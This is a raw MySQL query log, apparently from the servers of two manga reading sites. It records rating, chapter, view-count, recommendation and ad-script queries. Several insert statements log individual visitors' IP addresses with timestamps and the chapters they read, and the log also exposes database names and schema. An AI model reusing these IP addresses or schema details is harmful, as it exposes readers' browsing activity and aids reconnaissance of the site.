330646229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330646229 Quit 330646230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330646230 Quit 330646231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330646231 Quit 330646232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330646232 Quit 330646233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330646233 Quit 330646234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330646234 Quit 330646235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330646235 Quit 330646236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330646236 Quit 330646237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330646237 Quit 330646238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330646238 Quit 330646239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330646239 Quit 330646240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330646240 Quit 330646241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330646241 Quit 330646242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330646242 Quit 330646243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330646243 Quit 330646244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330646244 Quit 330646245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330646245 Quit 330646246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330646246 Quit 330646247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330646247 Quit 330646248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330646248 Quit 330646249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330646249 Quit 330646250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330646250 Quit 330646251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330646251 Quit 330646252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330646252 Quit 330646253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330646253 Quit 330646254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330646254 Quit 330646255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330646255 Quit 330646256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330646256 Quit 330646257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330646257 Quit 330646258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330646258 Quit 330646259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330646259 Quit 330646260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330646260 Quit 330646261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330646261 Quit 330646262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330646262 Quit 330646263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330646263 Quit 330646264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330646264 Quit 330646265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330646265 Quit 330646266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330646266 Quit 330646267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330646267 Quit 330646268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330646268 Quit 330646269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330646269 Quit 330646270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330646270 Quit 330646271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330646271 Quit 330646272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330646272 Quit 330646273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330646273 Quit 330646274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330646274 Quit 330646275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330646275 Quit 330646276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330646276 Quit 330646277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330646277 Quit 330646278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330646278 Quit 330646279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330646279 Quit 330646280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330646280 Quit 330646281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646281 Quit 330646282 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' 330646282 Quit 330646283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646283 Query select * FROM chapters where id = '12398' 330646283 Quit 330646284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646284 Query select * FROM chapters where manga_id = '58' order by id desc 330646284 Quit 330646285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646285 Query Update chapters set view=view+1 where id = '12398' 330646285 Quit 330646286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646286 Query select * FROM chapters where id = '12398' 330646286 Quit 330646287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646287 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' 330646287 Quit 330646288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646288 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('58', '12398', '130.193.211.3', 'mangacherri.com', '2026-02-26 03:28:44', '2026-02-26 03:28:44') 330646288 Quit 330646289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646289 Query select * FROM chapter_images where chapter_id = '12398' 330646289 Quit 330646290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646290 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '58' and m.active = 1 330646290 Quit 330646291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646291 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='58' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330646292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646292 Quit 330646293 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12442' 330646293 Quit 330646294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646294 Query select * FROM chapters where id = '12442' 330646294 Quit 330646295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646295 Query select * FROM chapters where manga_id = '239' order by id desc 330646295 Quit 330646296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646296 Query Update chapters set view=view+1 where id = '12442' 330646296 Quit 330646297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646297 Query select * FROM chapters where id = '12442' 330646298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646298 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12442' 330646297 Quit 330646299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646298 Quit 330646299 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12442', '142.93.147.90', 'mangacherri.com', '2026-02-26 03:28:44', '2026-02-26 03:28:44') 330646299 Quit 330646300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646300 Query select * FROM chapter_images where chapter_id = '12442' 330646300 Quit 330646301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646301 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330646301 Quit 330646302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646302 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330646303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646303 Quit 330646304 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17235' 330646304 Quit 330646305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646305 Query select * FROM chapters where id = '17235' 330646305 Quit 330646306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646306 Query select * FROM chapters where manga_id = '40' order by id desc 330646307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646307 Quit 330646308 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6649' 330646308 Quit 330646309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646309 Query select * FROM chapters where id = '6649' 330646309 Quit 330646310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646310 Query select * FROM chapters where manga_id = '127' order by id desc 330646306 Quit 330646311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646311 Query Update chapters set view=view+1 where id = '17235' 330646311 Quit 330646312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646312 Query select * FROM chapters where id = '17235' 330646312 Quit 330646313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646313 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17235' 330646313 Quit 330646314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646314 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('40', '17235', '66.249.68.133', 'mangacherri.com', '2026-02-26 03:28:44', '2026-02-26 03:28:44') 330646314 Quit 330646315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646315 Query select * FROM chapter_images where chapter_id = '17235' 330646315 Quit 330646316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646316 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '40' and m.active = 1 330646310 Quit 330646317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646317 Query Update chapters set view=view+1 where id = '6649' 330646317 Quit 330646318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646318 Query select * FROM chapters where id = '6649' 330646318 Quit 330646319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646319 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6649' 330646319 Quit 330646320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646316 Quit 330646320 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '6649', '118.103.255.196', 'mangacherri.com', '2026-02-26 03:28:44', '2026-02-26 03:28:44') 330646321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646321 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='40' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330646320 Quit 330646322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646322 Query select * FROM chapter_images where chapter_id = '6649' 330646322 Quit 330646323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646323 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330646323 Quit 330646324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646324 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330646291 Quit 330646325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646325 Quit 330646326 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646326 Quit 330646327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646327 Quit 330646328 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646328 Quit 330646329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646329 Quit 330646330 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646330 Quit 330646331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646332 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646331 Quit 330646332 Quit 260225 19:28:45 330646302 Quit 330646333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646334 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646333 Quit 330646334 Quit 330646335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646335 Quit 330646336 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646336 Quit 330646337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646337 Quit 330646338 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646338 Quit 330646339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646339 Quit 330646340 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646340 Quit 330646341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646341 Quit 330646342 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10754' 330646342 Quit 330646343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646343 Query select * FROM chapters where id = '10754' 330646343 Quit 330646344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646344 Query select * FROM chapters where manga_id = '57' order by id desc 330646324 Quit 330646345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646345 Quit 330646346 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646346 Quit 330646347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646344 Quit 330646347 Quit 330646348 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646348 Quit 330646349 Query Update chapters set view=view+1 where id = '10754' 330646350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646350 Quit 330646351 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646351 Quit 330646352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646349 Quit 330646352 Quit 330646353 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646353 Quit 330646354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646354 Query select * FROM chapters where id = '10754' 330646354 Quit 330646355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646355 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10754' 330646356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646355 Quit 330646356 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('57', '10754', '120.28.137.27', 'mangacherri.com', '2026-02-26 03:28:45', '2026-02-26 03:28:45') 330646356 Quit 330646357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646357 Query select * FROM chapter_images where chapter_id = '10754' 330646358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646358 Quit 330646359 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18202' 330646359 Quit 330646360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646360 Query select * FROM chapters where id = '18202' 330646360 Quit 330646361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646361 Query select * FROM chapters where manga_id = '382' order by id desc 330646361 Quit 330646362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646362 Query Update chapters set view=view+1 where id = '18202' 330646362 Quit 330646363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646363 Query select * FROM chapters where id = '18202' 330646364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646364 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18202' 330646363 Quit 330646365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646364 Quit 330646365 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('382', '18202', '146.174.176.159', 'mangacherri.com', '2026-02-26 03:28:45', '2026-02-26 03:28:45') 330646321 Quit 330646366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646366 Quit 330646367 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646365 Quit 330646367 Quit 330646368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646368 Query select * FROM chapter_images where chapter_id = '18202' 330646368 Quit 330646369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646369 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '382' and m.active = 1 330646369 Quit 330646370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646370 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='382' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330646371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646371 Quit 330646372 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646372 Quit 330646373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646373 Quit 330646374 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646374 Quit 330646375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646376 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646375 Quit 330646376 Quit 330646357 Quit 330646377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646377 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '57' and m.active = 1 330646377 Quit 330646378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646378 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='57' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330646379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646379 Quit 330646380 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11644' and m.active = 1 330646380 Quit 330646381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646381 Query select * FROM chapters where id = '11644' 330646381 Quit 330646382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646382 Query select * FROM chapters where manga_id = '245' order by display_priority ASC, id desc 330646382 Quit 330646383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646383 Query Update chapters set view=view+1 where id = '11644' 330646383 Quit 330646384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646384 Query select * FROM chapters where id = '11644' 330646384 Quit 330646385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646385 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11644' and m.active = 1 330646385 Quit 330646386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646386 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('245', '11644', '47.79.205.19', 'mangaberri.com', '2026-02-26 03:28:45', '2026-02-26 03:28:45') 330646386 Quit 330646387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646387 Query select * FROM chapter_images where chapter_id = '11644' 330646387 Quit 330646388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 